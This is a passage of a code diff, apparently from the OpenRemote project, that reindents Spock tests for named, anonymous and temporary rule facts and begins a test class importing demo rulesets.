-        assert rulesFacts.vars.size() == 0
-        assert !rulesFacts.hasTemporaryFacts()
+    then: "facts should be present"
+    assert rulesFacts.allFacts.count() == 3
+    assert rulesFacts.assetStates.size() == 0
+    assert rulesFacts.namedFacts.size() == 3
+    assert rulesFacts.anonymousFacts.size() == 0
+    assert rulesFacts.vars.size() == 0
+    assert !rulesFacts.hasTemporaryFacts()
 
-        and: "first matching should succeed"
-        assert rulesFacts.matchFirst("foo", { fact -> fact == "FOO" }).isPresent()
-        assert !rulesFacts.matchFirst("foo", { fact -> fact == "FOO123" }).isPresent()
-        assert rulesFacts.matchFirst("bar").isPresent()
-        assert !rulesFacts.matchFirst("bar", { fact -> fact == "BAR123" }).isPresent()
+    and: "first matching should succeed"
+    assert rulesFacts.matchFirst("foo", { fact -> fact == "FOO" }).isPresent()
+    assert !rulesFacts.matchFirst("foo", { fact -> fact == "FOO123" }).isPresent()
+    assert rulesFacts.matchFirst("bar").isPresent()
+    assert !rulesFacts.matchFirst("bar", { fact -> fact == "BAR123" }).isPresent()
 
-        and: "stream matching should succeed "
-        assert rulesFacts.match(String.class).count() == 2
-        assert rulesFacts.match(String.class, { fact -> fact == "FOO" }).count() == 1
-        assert rulesFacts.match(String.class, { fact -> fact == "FOO123" }).count() == 0
-        assert rulesFacts.match(Integer.class).count() == 0
-        assert rulesFacts.match(Collection.class, { fact -> fact.size() == 3 }).count() == 1
-        assert rulesFacts.match(Collection.class, { fact -> fact.size() == 2 }).count() == 0
+    and: "stream matching should succeed "
+    assert rulesFacts.match(String.class).count() == 2
+    assert rulesFacts.match(String.class, { fact -> fact == "FOO" }).count() == 1
+    assert rulesFacts.match(String.class, { fact -> fact == "FOO123" }).count() == 0
+    assert rulesFacts.match(Integer.class).count() == 0
+    assert rulesFacts.match(Collection.class, { fact -> fact.size() == 3 }).count() == 1
+    assert rulesFacts.match(Collection.class, { fact -> fact.size() == 2 }).count() == 0
 
-        when: "a named fact is updated"
-        rulesFacts.put("foo", "NEWFOO")
+    when: "a named fact is updated"
+    rulesFacts.put("foo", "NEWFOO")
 
-        then: "the update should be present"
-        assert !rulesFacts.matchFirst("foo", { fact -> fact == "FOO" }).isPresent()
-        assert rulesFacts.matchFirst("foo", { fact -> fact == "NEWFOO" }).isPresent()
-        assert rulesFacts.namedFacts.size() == 3
+    then: "the update should be present"
+    assert !rulesFacts.matchFirst("foo", { fact -> fact == "FOO" }).isPresent()
+    assert rulesFacts.matchFirst("foo", { fact -> fact == "NEWFOO" }).isPresent()
+    assert rulesFacts.namedFacts.size() == 3
 
-        when: "a named fact is removed"
-        rulesFacts.remove("foo")
+    when: "a named fact is removed"
+    rulesFacts.remove("foo")
 
-        then: "the fact should be removed"
-        assert !rulesFacts.matchFirst("foo", { fact -> fact == "NEWFOO" }).isPresent()
-        assert rulesFacts.namedFacts.size() == 2
-    }
+    then: "the fact should be removed"
+    assert !rulesFacts.matchFirst("foo", { fact -> fact == "NEWFOO" }).isPresent()
+    assert rulesFacts.namedFacts.size() == 2
+  }
 
-    def "Handle anonymous facts"() {
+  def "Handle anonymous facts"() {
 
-        when: "some anonymous facts are added"
-        def anonFact1 = new AnonFact("FOO1", 123, true)
-        rulesFacts.put(anonFact1)
-        rulesFacts.put(new AnonFact("FOO2", 456, false))
-        rulesFacts.put(new AnonFact("FOO3", 789, true))
+    when: "some anonymous facts are added"
+    def anonFact1 = new AnonFact("FOO1", 123, true)
+    rulesFacts.put(anonFact1)
+    rulesFacts.put(new AnonFact("FOO2", 456, false))
+    rulesFacts.put(new AnonFact("FOO3", 789, true))
 
-        then: "facts should be present"
-        assert rulesFacts.allFacts.count() == 3
-        assert rulesFacts.assetStates.size() == 0
-        assert rulesFacts.namedFacts.size() == 0
-        assert rulesFacts.anonymousFacts.size() == 3
-        assert rulesFacts.vars.size() == 0
-        assert !rulesFacts.hasTemporaryFacts()
+    then: "facts should be present"
+    assert rulesFacts.allFacts.count() == 3
+    assert rulesFacts.assetStates.size() == 0
+    assert rulesFacts.namedFacts.size() == 0
+    assert rulesFacts.anonymousFacts.size() == 3
+    assert rulesFacts.vars.size() == 0
+    assert !rulesFacts.hasTemporaryFacts()
 
-        and: "first matching should succeed"
-        assert rulesFacts.matchFirst(AnonFact, { fact -> fact.foo == "FOO1" }).isPresent()
-        assert rulesFacts.matchFirst({ fact -> fact.foo == "FOO1" }).isPresent()
-        assert rulesFacts.matchFirst({ fact -> fact.bar == 456 }).isPresent()
-        assert rulesFacts.matchFirst({ fact -> fact.baz == true }).isPresent()
-        assert !rulesFacts.matchFirst({ fact -> fact.foo == "FOO1123" }).isPresent()
-        assert !rulesFacts.matchFirst({ fact -> fact.bar == 111 }).isPresent()
+    and: "first matching should succeed"
+    assert rulesFacts.matchFirst(AnonFact, { fact -> fact.foo == "FOO1" }).isPresent()
+    assert rulesFacts.matchFirst({ fact -> fact.foo == "FOO1" }).isPresent()
+    assert rulesFacts.matchFirst({ fact -> fact.bar == 456 }).isPresent()
+    assert rulesFacts.matchFirst({ fact -> fact.baz == true }).isPresent()
+    assert !rulesFacts.matchFirst({ fact -> fact.foo == "FOO1123" }).isPresent()
+    assert !rulesFacts.matchFirst({ fact -> fact.bar == 111 }).isPresent()
 
-        and: "stream matching should succeed "
-        assert rulesFacts.match({ fact -> fact.foo == "FOO1" }).count() == 1
-        assert rulesFacts.match({ fact -> fact.bar == 456 }).count() == 1
-        assert rulesFacts.match({ fact -> fact.baz == true }).count() == 2
-        assert rulesFacts.match(AnonFact, { fact -> fact.foo == "FOO1" }).count() == 1
-        assert rulesFacts.match(AnonFact, { fact -> fact.bar == 456 }).count() == 1
-        assert rulesFacts.match(AnonFact, { fact -> fact.baz }).count() == 2
-        assert rulesFacts.match(String, { fact -> true }).count() == 0
+    and: "stream matching should succeed "
+    assert rulesFacts.match({ fact -> fact.foo == "FOO1" }).count() == 1
+    assert rulesFacts.match({ fact -> fact.bar == 456 }).count() == 1
+    assert rulesFacts.match({ fact -> fact.baz == true }).count() == 2
+    assert rulesFacts.match(AnonFact, { fact -> fact.foo == "FOO1" }).count() == 1
+    assert rulesFacts.match(AnonFact, { fact -> fact.bar == 456 }).count() == 1
+    assert rulesFacts.match(AnonFact, { fact -> fact.baz }).count() == 2
+    assert rulesFacts.match(String, { fact -> true }).count() == 0
 
-        when: "an anonymous fact is updated"
-        anonFact1.foo = "NEWFOO1"
-        rulesFacts.put(anonFact1)
+    when: "an anonymous fact is updated"
+    anonFact1.foo = "NEWFOO1"
+    rulesFacts.put(anonFact1)
 
-        then: "the update should be present"
-        assert !rulesFacts.matchFirst({ fact -> fact.foo == "FOO" }).isPresent()
-        assert rulesFacts.matchFirst({ fact -> fact.foo == "NEWFOO1" }).isPresent()
-        assert rulesFacts.anonymousFacts.size() == 3
+    then: "the update should be present"
+    assert !rulesFacts.matchFirst({ fact -> fact.foo == "FOO" }).isPresent()
+    assert rulesFacts.matchFirst({ fact -> fact.foo == "NEWFOO1" }).isPresent()
+    assert rulesFacts.anonymousFacts.size() == 3
 
-        when: "an anonymous fact is removed"
-        rulesFacts.remove(anonFact1)
+    when: "an anonymous fact is removed"
+    rulesFacts.remove(anonFact1)
 
-        then: "the fact should be removed"
-        assert !rulesFacts.matchFirst({ fact -> fact.foo == "NEWFOO1" }).isPresent()
-        assert rulesFacts.anonymousFacts.size() == 2
-    }
+    then: "the fact should be removed"
+    assert !rulesFacts.matchFirst({ fact -> fact.foo == "NEWFOO1" }).isPresent()
+    assert rulesFacts.anonymousFacts.size() == 2
+  }
 
-    def "Handle anonymous facts with value equality"() {
+  def "Handle anonymous facts with value equality"() {
 
-        when: "some anonymous facts are added"
-        rulesFacts.put(new AnonFact("NOID1", 1, true))
-        rulesFacts.put(new AnonFact("NOID2", 2, true))
-        rulesFacts.put(new AnonFactWithId("ONE", "FOO1"))
-        rulesFacts.put(new AnonFactWithId("ONE", "FOO2"))
-        rulesFacts.put(new AnonFactWithId("ONE", "FOO3"))
-        rulesFacts.put(new AnonFactWithId("TWO", "BAR"))
-        rulesFacts.put(new AnonFactWithId("THREE", "BAZ"))
+    when: "some anonymous facts are added"
+    rulesFacts.put(new AnonFact("NOID1", 1, true))
+    rulesFacts.put(new AnonFact("NOID2", 2, true))
+    rulesFacts.put(new AnonFactWithId("ONE", "FOO1"))
+    rulesFacts.put(new AnonFactWithId("ONE", "FOO2"))
+    rulesFacts.put(new AnonFactWithId("ONE", "FOO3"))
+    rulesFacts.put(new AnonFactWithId("TWO", "BAR"))
+    rulesFacts.put(new AnonFactWithId("THREE", "BAZ"))
 
-        then: "facts should be present"
-        assert rulesFacts.allFacts.count() == 5
-        assert rulesFacts.assetStates.size() == 0
-        assert rulesFacts.namedFacts.size() == 0
-        assert rulesFacts.anonymousFacts.size() == 5
-        assert rulesFacts.vars.size() == 0
-        assert !rulesFacts.hasTemporaryFacts()
+    then: "facts should be present"
+    assert rulesFacts.allFacts.count() == 5
+    assert rulesFacts.assetStates.size() == 0
+    assert rulesFacts.namedFacts.size() == 0
+    assert rulesFacts.anonymousFacts.size() == 5
+    assert rulesFacts.vars.size() == 0
+    assert !rulesFacts.hasTemporaryFacts()
 
-        and: "matching should succeed"
-        assert rulesFacts.match(AnonFact).count() == 2
-        assert rulesFacts.match(AnonFactWithId).count() == 3
-        assert rulesFacts.match(AnonFactWithId, { it.foo == "FOO3"}).count() == 1
-        assert rulesFacts.matchFirst(AnonFactWithId, { it.foo == "FOO3"}).isPresent()
+    and: "matching should succeed"
+    assert rulesFacts.match(AnonFact).count() == 2
+    assert rulesFacts.match(AnonFactWithId).count() == 3
+    assert rulesFacts.match(AnonFactWithId, { it.foo == "FOO3"}).count() == 1
+    assert rulesFacts.matchFirst(AnonFactWithId, { it.foo == "FOO3"}).isPresent()
 
-        when: "an anonymous fact is updated"
-        rulesFacts.put(new AnonFactWithId("ONE", "FOO4"))
+    when: "an anonymous fact is updated"
+    rulesFacts.put(new AnonFactWithId("ONE", "FOO4"))
 
-        then: "updated facts should be present"
-        assert rulesFacts.allFacts.count() == 5
-        assert rulesFacts.assetStates.size() == 0
-        assert rulesFacts.namedFacts.size() == 0
-        assert rulesFacts.anonymousFacts.size() == 5
-        assert rulesFacts.vars.size() == 0
-        assert !rulesFacts.hasTemporaryFacts()
+    then: "updated facts should be present"
+    assert rulesFacts.allFacts.count() == 5
+    assert rulesFacts.assetStates.size() == 0
+    assert rulesFacts.namedFacts.size() == 0
+    assert rulesFacts.anonymousFacts.size() == 5
+    assert rulesFacts.vars.size() == 0
+    assert !rulesFacts.hasTemporaryFacts()
 
-        and: "matching should succeed"
-        assert rulesFacts.match(AnonFact).count() == 2
-        assert rulesFacts.match(AnonFactWithId).count() == 3
-        assert rulesFacts.match(AnonFactWithId, { it.foo == "FOO3"}).count() == 0
-        assert !rulesFacts.matchFirst(AnonFactWithId, { it.foo == "FOO3"}).isPresent()
-        assert rulesFacts.match(AnonFactWithId, { it.foo == "FOO4"}).count() == 1
-        assert rulesFacts.matchFirst(AnonFactWithId, { it.foo == "FOO4"}).isPresent()
+    and: "matching should succeed"
+    assert rulesFacts.match(AnonFact).count() == 2
+    assert rulesFacts.match(AnonFactWithId).count() == 3
+    assert rulesFacts.match(AnonFactWithId, { it.foo == "FOO3"}).count() == 0
+    assert !rulesFacts.matchFirst(AnonFactWithId, { it.foo == "FOO3"}).isPresent()
+    assert rulesFacts.match(AnonFactWithId, { it.foo == "FOO4"}).count() == 1
+    assert rulesFacts.matchFirst(AnonFactWithId, { it.foo == "FOO4"}).isPresent()
 
-        when: "an anonymous fact is removed"
-        rulesFacts.remove(new AnonFactWithId("ONE", "whatever"))
+    when: "an anonymous fact is removed"
+    rulesFacts.remove(new AnonFactWithId("ONE", "whatever"))
 
-        then: "the fact should be removed"
-        assert rulesFacts.match(AnonFact).count() == 2
-        assert rulesFacts.match(AnonFactWithId).count() == 2
-        assert rulesFacts.match(AnonFactWithId, { it.foo == "FOO4"}).count() == 0
-        assert !rulesFacts.matchFirst(AnonFactWithId, { it.foo == "FOO4"}).isPresent()
-        assert rulesFacts.anonymousFacts.size() == 4
-    }
+    then: "the fact should be removed"
+    assert rulesFacts.match(AnonFact).count() == 2
+    assert rulesFacts.match(AnonFactWithId).count() == 2
+    assert rulesFacts.match(AnonFactWithId, { it.foo == "FOO4"}).count() == 0
+    assert !rulesFacts.matchFirst(AnonFactWithId, { it.foo == "FOO4"}).isPresent()
+    assert rulesFacts.anonymousFacts.size() == 4
+  }
 
-    def "Handle anonymous and named facts of same type"() {
+  def "Handle anonymous and named facts of same type"() {
 
-        when: "some anonymous and named facts are added"
+    when: "some anonymous and named facts are added"
 
-        def fact1 = new AnonFactWithId("ONE", "FOO")
-        def fact2 = new AnonFactWithId("TWO", "BAR")
-        def fact3 = new AnonFactWithId("THREE", "BAZ")
-        rulesFacts.put(fact1)
-        rulesFacts.put(fact2)
-        rulesFacts.put(fact3)
-        rulesFacts.put("Anon-$fact1.foo", fact1)
-        rulesFacts.put("Anon-$fact2.foo", fact2)
-        rulesFacts.put("Anon-$fact3.foo", fact3)
+    def fact1 = new AnonFactWithId("ONE", "FOO")
+    def fact2 = new AnonFactWithId("TWO", "BAR")
+    def fact3 = new AnonFactWithId("THREE", "BAZ")
+    rulesFacts.put(fact1)
+    rulesFacts.put(fact2)
+    rulesFacts.put(fact3)
+    rulesFacts.put("Anon-$fact1.foo", fact1)
+    rulesFacts.put("Anon-$fact2.foo", fact2)
+    rulesFacts.put("Anon-$fact3.foo", fact3)
 
-        then: "facts should be present"
-        assert rulesFacts.allFacts.count() == 6
-        assert rulesFacts.assetStates.size() == 0
-        assert rulesFacts.namedFacts.size() == 3
-        assert rulesFacts.anonymousFacts.size() == 3
-        assert rulesFacts.vars.size() == 0
-        assert !rulesFacts.hasTemporaryFacts()
+    then: "facts should be present"
+    assert rulesFacts.allFacts.count() == 6
+    assert rulesFacts.assetStates.size() == 0
+    assert rulesFacts.namedFacts.size() == 3
+    assert rulesFacts.anonymousFacts.size() == 3
+    assert rulesFacts.vars.size() == 0
+    assert !rulesFacts.hasTemporaryFacts()
 
-        and: "matching should succeed"
-        assert rulesFacts.match(AnonFactWithId).count() == 6
-        assert rulesFacts.match(AnonFactWithId, { it.foo == "FOO"}).count() == 2
-        assert rulesFacts.matchFirst(AnonFactWithId, { it.foo == "FOO"}).isPresent()
+    and: "matching should succeed"
+    assert rulesFacts.match(AnonFactWithId).count() == 6
+    assert rulesFacts.match(AnonFactWithId, { it.foo == "FOO"}).count() == 2
+    assert rulesFacts.matchFirst(AnonFactWithId, { it.foo == "FOO"}).isPresent()
 
-        when: "an anonymous fact is updated"
-        rulesFacts.put(new AnonFactWithId("ONE", "NEW"))
+    when: "an anonymous fact is updated"
+    rulesFacts.put(new AnonFactWithId("ONE", "NEW"))
 
-        then: "updated facts should be present"
-        assert rulesFacts.allFacts.count() == 6
-        assert rulesFacts.assetStates.size() == 0
-        assert rulesFacts.namedFacts.size() == 3
-        assert rulesFacts.anonymousFacts.size() == 3
-        assert rulesFacts.vars.size() == 0
-        assert !rulesFacts.hasTemporaryFacts()
+    then: "updated facts should be present"
+    assert rulesFacts.allFacts.count() == 6
+    assert rulesFacts.assetStates.size() == 0
+    assert rulesFacts.namedFacts.size() == 3
+    assert rulesFacts.anonymousFacts.size() == 3
+    assert rulesFacts.vars.size() == 0
+    assert !rulesFacts.hasTemporaryFacts()
 
-        and: "matching should succeed"
-        assert rulesFacts.match(AnonFactWithId).count() == 6
-        assert rulesFacts.match(AnonFactWithId, { it.foo == "FOO"}).count() == 1
-        assert rulesFacts.matchFirst(AnonFactWithId, { it.foo == "FOO"}).isPresent()
-        assert rulesFacts.match(AnonFactWithId, { it.foo == "NEW"}).count() == 1
-        assert rulesFacts.matchFirst(AnonFactWithId, { it.foo == "NEW"}).isPresent()
+    and: "matching should succeed"
+    assert rulesFacts.match(AnonFactWithId).count() == 6
+    assert rulesFacts.match(AnonFactWithId, { it.foo == "FOO"}).count() == 1
+    assert rulesFacts.matchFirst(AnonFactWithId, { it.foo == "FOO"}).isPresent()
+    assert rulesFacts.match(AnonFactWithId, { it.foo == "NEW"}).count() == 1
+    assert rulesFacts.matchFirst(AnonFactWithId, { it.foo == "NEW"}).isPresent()
 
-        when: "an anonymous fact is removed"
-        rulesFacts.remove(new AnonFactWithId("ONE", "whatever"))
+    when: "an anonymous fact is removed"
+    rulesFacts.remove(new AnonFactWithId("ONE", "whatever"))
 
-        then: "updated facts should be present"
-        assert rulesFacts.allFacts.count() == 5
-        assert rulesFacts.assetStates.size() == 0
-        assert rulesFacts.namedFacts.size() == 3
-        assert rulesFacts.anonymousFacts.size() == 2
-        assert rulesFacts.vars.size() == 0
-        assert !rulesFacts.hasTemporaryFacts()
+    then: "updated facts should be present"
+    assert rulesFacts.allFacts.count() == 5
+    assert rulesFacts.assetStates.size() == 0
+    assert rulesFacts.namedFacts.size() == 3
+    assert rulesFacts.anonymousFacts.size() == 2
+    assert rulesFacts.vars.size() == 0
+    assert !rulesFacts.hasTemporaryFacts()
 
-        then: "the fact should be removed"
-        assert rulesFacts.match(AnonFactWithId).count() == 5
-        assert rulesFacts.match(AnonFactWithId, { it.foo == "FOO"}).count() == 1
-        assert rulesFacts.matchFirst(AnonFactWithId, { it.foo == "FOO"}).isPresent()
-        assert rulesFacts.match(AnonFactWithId, { it.foo == "NEW"}).count() == 0
-        assert !rulesFacts.matchFirst(AnonFactWithId, { it.foo == "NEW"}).isPresent()
-    }
+    then: "the fact should be removed"
+    assert rulesFacts.match(AnonFactWithId).count() == 5
+    assert rulesFacts.match(AnonFactWithId, { it.foo == "FOO"}).count() == 1
+    assert rulesFacts.matchFirst(AnonFactWithId, { it.foo == "FOO"}).isPresent()
+    assert rulesFacts.match(AnonFactWithId, { it.foo == "NEW"}).count() == 0
+    assert !rulesFacts.matchFirst(AnonFactWithId, { it.foo == "NEW"}).isPresent()
+  }
 
-    def "Handle temporary named facts"() {
+  def "Handle temporary named facts"() {
 
-        when: "some temporary facts are added"
-        rulesFacts.putTemporary("foo", "PT5S", "FOO")
-        rulesFacts.putTemporary("bar", "PT10S", "BAR")
-        rulesFacts.putTemporary("baz", "PT15S", "BAZ")
+    when: "some temporary facts are added"
+    rulesFacts.putTemporary("foo", "PT5S", "FOO")
+    rulesFacts.putTemporary("bar", "PT10S", "BAR")
+    rulesFacts.putTemporary("baz", "PT15S", "BAZ")
 
-        and: "the clock is advanced and temporary facts are expired"
-        timerService.getClock().advanceTime(3, TimeUnit.SECONDS)
-        rulesFacts.removeExpiredTemporaryFacts()
+    and: "the clock is advanced and temporary facts are expired"
+    timerService.getClock().advanceTime(3, TimeUnit.SECONDS)
+    rulesFacts.removeExpiredTemporaryFacts()
 
-        then: "all temporary facts should still be present"
-        assert rulesFacts.hasTemporaryFacts()
-        assert rulesFacts.getAllFacts().count() == 3
-        assert rulesFacts.matchFirst("foo").isPresent()
-        assert rulesFacts.matchFirst("bar").isPresent()
-        assert rulesFacts.matchFirst("baz").isPresent()
-        assert rulesFacts.get("foo") == "FOO"
-        assert rulesFacts.getOptional("foo").get() == "FOO"
-        assert rulesFacts.get("abc") == null
-        assert !rulesFacts.getOptional("abc").isPresent()
+    then: "all temporary facts should still be present"
+    assert rulesFacts.hasTemporaryFacts()
+    assert rulesFacts.getAllFacts().count() == 3
+    assert rulesFacts.matchFirst("foo").isPresent()
+    assert rulesFacts.matchFirst("bar").isPresent()
+    assert rulesFacts.matchFirst("baz").isPresent()
+    assert rulesFacts.get("foo") == "FOO"
+    assert rulesFacts.getOptional("foo").get() == "FOO"
+    assert rulesFacts.get("abc") == null
+    assert !rulesFacts.getOptional("abc").isPresent()
 
-        when: "the clock is advanced and temporary facts are expired"
-        timerService.getClock().advanceTime(3, TimeUnit.SECONDS)
-        rulesFacts.removeExpiredTemporaryFacts()
+    when: "the clock is advanced and temporary facts are expired"
+    timerService.getClock().advanceTime(3, TimeUnit.SECONDS)
+    rulesFacts.removeExpiredTemporaryFacts()
 
-        then: "some temporary facts should still be present"
-        assert rulesFacts.hasTemporaryFacts()
-        assert rulesFacts.getAllFacts().count() == 2
-        assert !rulesFacts.matchFirst("foo").isPresent()
-        assert rulesFacts.matchFirst("bar").isPresent()
-        assert rulesFacts.matchFirst("baz").isPresent()
+    then: "some temporary facts should still be present"
+    assert rulesFacts.hasTemporaryFacts()
+    assert rulesFacts.getAllFacts().count() == 2
+    assert !rulesFacts.matchFirst("foo").isPresent()
+    assert rulesFacts.matchFirst("bar").isPresent()
+    assert rulesFacts.matchFirst("baz").isPresent()
 
-        when: "the clock is advanced and temporary facts are expired"
-        timerService.getClock().advanceTime(6, TimeUnit.SECONDS)
-        rulesFacts.removeExpiredTemporaryFacts()
+    when: "the clock is advanced and temporary facts are expired"
+    timerService.getClock().advanceTime(6, TimeUnit.SECONDS)
+    rulesFacts.removeExpiredTemporaryFacts()
 
-        then: "some temporary facts should still be present"
-        assert rulesFacts.hasTemporaryFacts()
-        assert rulesFacts.getAllFacts().count() == 1
-        assert !rulesFacts.matchFirst("foo").isPresent()
-        assert !rulesFacts.matchFirst("bar").isPresent()
-        assert rulesFacts.matchFirst("baz").isPresent()
+    then: "some temporary facts should still be present"
+    assert rulesFacts.hasTemporaryFacts()
+    assert rulesFacts.getAllFacts().count() == 1
+    assert !rulesFacts.matchFirst("foo").isPresent()
+    assert !rulesFacts.matchFirst("bar").isPresent()
+    assert rulesFacts.matchFirst("baz").isPresent()
 
-        when: "a temporary fact is removed manually"
-        rulesFacts.remove("baz")
+    when: "a temporary fact is removed manually"
+    rulesFacts.remove("baz")
 
-        then: "all temporary facts should be gone"
-        assert !rulesFacts.hasTemporaryFacts()
-        assert rulesFacts.getAllFacts().count() == 0
-        assert !rulesFacts.matchFirst("foo").isPresent()
-        assert !rulesFacts.matchFirst("bar").isPresent()
-        assert !rulesFacts.matchFirst("baz").isPresent()
-    }
+    then: "all temporary facts should be gone"
+    assert !rulesFacts.hasTemporaryFacts()
+    assert rulesFacts.getAllFacts().count() == 0
+    assert !rulesFacts.matchFirst("foo").isPresent()
+    assert !rulesFacts.matchFirst("bar").isPresent()
+    assert !rulesFacts.matchFirst("baz").isPresent()
+  }
 
-    def "Handle temporary anonymous facts"() {
+  def "Handle temporary anonymous facts"() {
 
-        when: "some temporary facts are added"
-        def anonFact1 = new AnonFact("FOO1", 123, true)
-        rulesFacts.putTemporary("PT5S", anonFact1)
-        def anonFact2 = new AnonFact("FOO2", 456, false)
-        rulesFacts.putTemporary("PT10S", anonFact2)
-        def anonFact3 = new AnonFact("FOO3", 789, true)
-        rulesFacts.putTemporary("PT15S", anonFact3)
+    when: "some temporary facts are added"
+    def anonFact1 = new AnonFact("FOO1", 123, true)
+    rulesFacts.putTemporary("PT5S", anonFact1)
+    def anonFact2 = new AnonFact("FOO2", 456, false)
+    rulesFacts.putTemporary("PT10S", anonFact2)
+    def anonFact3 = new AnonFact("FOO3", 789, true)
+    rulesFacts.putTemporary("PT15S", anonFact3)
 
-        and: "the clock is advanced and temporary facts are expired"
-        timerService.getClock().advanceTime(3, TimeUnit.SECONDS)
-        rulesFacts.removeExpiredTemporaryFacts()
+    and: "the clock is advanced and temporary facts are expired"
+    timerService.getClock().advanceTime(3, TimeUnit.SECONDS)
+    rulesFacts.removeExpiredTemporaryFacts()
 
-        then: "all temporary facts should still be present"
-        assert rulesFacts.hasTemporaryFacts()
-        assert rulesFacts.match(AnonFact).count() == 3
-        assert rulesFacts.match(String).count() == 0
-        assert rulesFacts.match(AnonFact, { fact -> fact.foo == "FOO1" }).count() == 1
-        assert rulesFacts.matchFirst(AnonFact, { fact -> fact.foo == "FOO1" }).get() == anonFact1
-        assert rulesFacts.match(AnonFact, { fact -> fact.baz }).count() == 2
-        assert rulesFacts.match(AnonFact).collect(Collectors.toList()).contains(anonFact1)
-        assert rulesFacts.match(AnonFact).collect(Collectors.toList()).contains(anonFact2)
-        assert rulesFacts.match(AnonFact).collect(Collectors.toList()).contains(anonFact3)
+    then: "all temporary facts should still be present"
+    assert rulesFacts.hasTemporaryFacts()
+    assert rulesFacts.match(AnonFact).count() == 3
+    assert rulesFacts.match(String).count() == 0
+    assert rulesFacts.match(AnonFact, { fact -> fact.foo == "FOO1" }).count() == 1
+    assert rulesFacts.matchFirst(AnonFact, { fact -> fact.foo == "FOO1" }).get() == anonFact1
+    assert rulesFacts.match(AnonFact, { fact -> fact.baz }).count() == 2
+    assert rulesFacts.match(AnonFact).collect(Collectors.toList()).contains(anonFact1)
+    assert rulesFacts.match(AnonFact).collect(Collectors.toList()).contains(anonFact2)
+    assert rulesFacts.match(AnonFact).collect(Collectors.toList()).contains(anonFact3)
 
-        when: "the clock is advanced and temporary facts are expired"
-        timerService.getClock().advanceTime(3, TimeUnit.SECONDS)
-        rulesFacts.removeExpiredTemporaryFacts()
+    when: "the clock is advanced and temporary facts are expired"
+    timerService.getClock().advanceTime(3, TimeUnit.SECONDS)
+    rulesFacts.removeExpiredTemporaryFacts()
 
-        then: "some temporary facts should still be present"
-        assert rulesFacts.hasTemporaryFacts()
-        assert rulesFacts.match(AnonFact).count() == 2
-        assert rulesFacts.match(AnonFact, { fact -> fact.foo == "FOO1" }).count() == 0
-        assert rulesFacts.match(AnonFact, { fact -> fact.foo.startsWith("FOO") }).count() == 2
-        assert rulesFacts.match(AnonFact, { fact -> fact.baz }).count() == 1
+    then: "some temporary facts should still be present"
+    assert rulesFacts.hasTemporaryFacts()
+    assert rulesFacts.match(AnonFact).count() == 2
+    assert rulesFacts.match(AnonFact, { fact -> fact.foo == "FOO1" }).count() == 0
+    assert rulesFacts.match(AnonFact, { fact -> fact.foo.startsWith("FOO") }).count() == 2
+    assert rulesFacts.match(AnonFact, { fact -> fact.baz }).count() == 1
 
-        when: "the clock is advanced and temporary facts are expired"
-        timerService.getClock().advanceTime(6, TimeUnit.SECONDS)
-        rulesFacts.removeExpiredTemporaryFacts()
+    when: "the clock is advanced and temporary facts are expired"
+    timerService.getClock().advanceTime(6, TimeUnit.SECONDS)
+    rulesFacts.removeExpiredTemporaryFacts()
 
-        then: "some temporary facts should still be present"
-        assert rulesFacts.hasTemporaryFacts()
-        assert rulesFacts.match(AnonFact).count() == 1
-        assert rulesFacts.match(AnonFact, { fact -> fact.foo == "FOO1" }).count() == 0
-        assert rulesFacts.match(AnonFact, { fact -> fact.foo.startsWith("FOO") }).count() == 1
-        assert rulesFacts.match(AnonFact, { fact -> fact.baz }).count() == 1
+    then: "some temporary facts should still be present"
+    assert rulesFacts.hasTemporaryFacts()
+    assert rulesFacts.match(AnonFact).count() == 1
+    assert rulesFacts.match(AnonFact, { fact -> fact.foo == "FOO1" }).count() == 0
+    assert rulesFacts.match(AnonFact, { fact -> fact.foo.startsWith("FOO") }).count() == 1
+    assert rulesFacts.match(AnonFact, { fact -> fact.baz }).count() == 1
 
-        when: "a temporary fact is removed manually"
-        rulesFacts.remove(anonFact3)
+    when: "a temporary fact is removed manually"
+    rulesFacts.remove(anonFact3)
 
-        then: "all temporary facts should be gone"
-        assert !rulesFacts.hasTemporaryFacts()
-        assert rulesFacts.match(AnonFact).count() == 0
-    }
+    then: "all temporary facts should be gone"
+    assert !rulesFacts.hasTemporaryFacts()
+    assert rulesFacts.match(AnonFact).count() == 0
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/BasicRulesImport.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/BasicRulesImport.groovy
@@ -33,153 +33,155 @@ import static org.openremote.model.rules.RulesetStatus.DEPLOYED
 
 class BasicRulesImport {
 
-    final Long globalRulesetId
-    final Long globalRuleset2Id
-    final Long masterRulesetId
-    final Long realmBuildingRulesetId
-    final Long realmCityRulesetId
-    final Long apartment1RulesetId
-    final Long apartment2RulesetId
-    final Long apartment3RulesetId
+  final Long globalRulesetId
+  final Long globalRuleset2Id
+  final Long masterRulesetId
+  final Long realmBuildingRulesetId
+  final Long realmCityRulesetId
+  final Long apartment1RulesetId
+  final Long apartment2RulesetId
+  final Long apartment3RulesetId
 
-    RulesEngine globalEngine
-    RulesEngine masterEngine
-    RulesEngine realmBuildingEngine
-    RulesEngine apartment1Engine
-    RulesEngine apartment2Engine
-    RulesEngine apartment3Engine
+  RulesEngine globalEngine
+  RulesEngine masterEngine
+  RulesEngine realmBuildingEngine
+  RulesEngine apartment1Engine
+  RulesEngine apartment2Engine
+  RulesEngine apartment3Engine
 
-    BasicRulesImport(RulesetStorageService rulesetStorageService,
-                     KeycloakTestSetup keycloakTestSetup,
-                     ManagerTestSetup managerTestSetup) {
+  BasicRulesImport(RulesetStorageService rulesetStorageService,
+  KeycloakTestSetup keycloakTestSetup,
+  ManagerTestSetup managerTestSetup) {
 
-        Ruleset ruleset = new GlobalRuleset(
-                "Some global demo rules", GROOVY,
-                getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates.groovy").text)
-        globalRulesetId = rulesetStorageService.merge(ruleset).id
+    Ruleset ruleset = new GlobalRuleset(
+            "Some global demo rules", GROOVY,
+            getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates.groovy").text)
+    globalRulesetId = rulesetStorageService.merge(ruleset).id
 
-        ruleset = new GlobalRuleset(
-                "Other global demo rules with a long name that should fill up space in UI", GROOVY,
-                getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates.groovy").text)
-        ruleset.setEnabled(false)
-        globalRuleset2Id = rulesetStorageService.merge(ruleset).id
+    ruleset = new GlobalRuleset(
+            "Other global demo rules with a long name that should fill up space in UI", GROOVY,
+            getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates.groovy").text)
+    ruleset.setEnabled(false)
